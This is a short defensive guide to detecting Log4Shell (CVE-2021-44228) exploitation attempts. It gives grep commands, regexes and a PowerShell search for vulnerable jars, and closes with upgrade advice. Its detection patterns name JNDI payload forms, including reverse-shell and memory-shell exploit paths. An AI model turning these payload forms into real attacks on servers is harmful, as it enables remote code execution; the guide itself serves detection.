Log4j RCE Exploitation Detection

3 mins read

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228.

Related News:
Log4j RCE Callback Connection
Live Log4J worldwide threat tracker

  • RegEx
^(?:.(?:.(?:.(?:.(?:.(?=.(?:..jndi.))(?=.(?:..ldap.|..rmi.|..ldaps.|..dns.|..lower.|..upper.)))|.(?:.(?=.(?:..jndi.))(?=.(?:..ldap.|..rmi.|..ldaps.|..dns.|..lower.|..upper.)))))|.(?:.(?=.(?:..jndi.))(?=.(?:..ldap.|..rmi.|..ldaps.|..dns.|..lower.|..upper.)))))
  • Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$({|%7B)jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log

This command searches for exploitation attempts in compressed files in folder /var/log and all sub folders

sudo find /var/log -name *.gz -print0 | xargs -0 zgrep -E -i '\$({|%7B)jndi:(ldap[s]?|rmi|dns):/[^\n]+'
  • Grep / Zgrep – Obfuscated Variants

These commands cover even the obfuscated variants but lack the file name in a match.

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -I -i 'jndi:(ldap[s]?|rmi|dns):'" \;

This command searches for exploitation attempts in compressed files in folder /var/log and all sub folders

sudo find /var/log/ -name "*.log.gz" -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'" \;
  • Log4Shell Detector (Python)

Python based scanner to detect the most obfuscated forms of the exploit codes.

GitHub – Neo23x0/log4shell-detector: Detector for Log4Shell exploitation attempts

  • Find Vulnerable Software (Windows)
gci 'C:\' -rec -force -include *.jar -ea 0 | foreach {select-string "JndiLookup.class" $_} | select -exp Path
  • Detects indicators of JDNI usage in log files and other payloads
ldap:\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\/
  • Detects indicators in server logs that indicate the exploitation of CVE-2021-44228
$\{jndi:(ldap|ldaps|rmi|dns):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}

Recommendation:

Upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).



 $ 36.8   39.6   9.1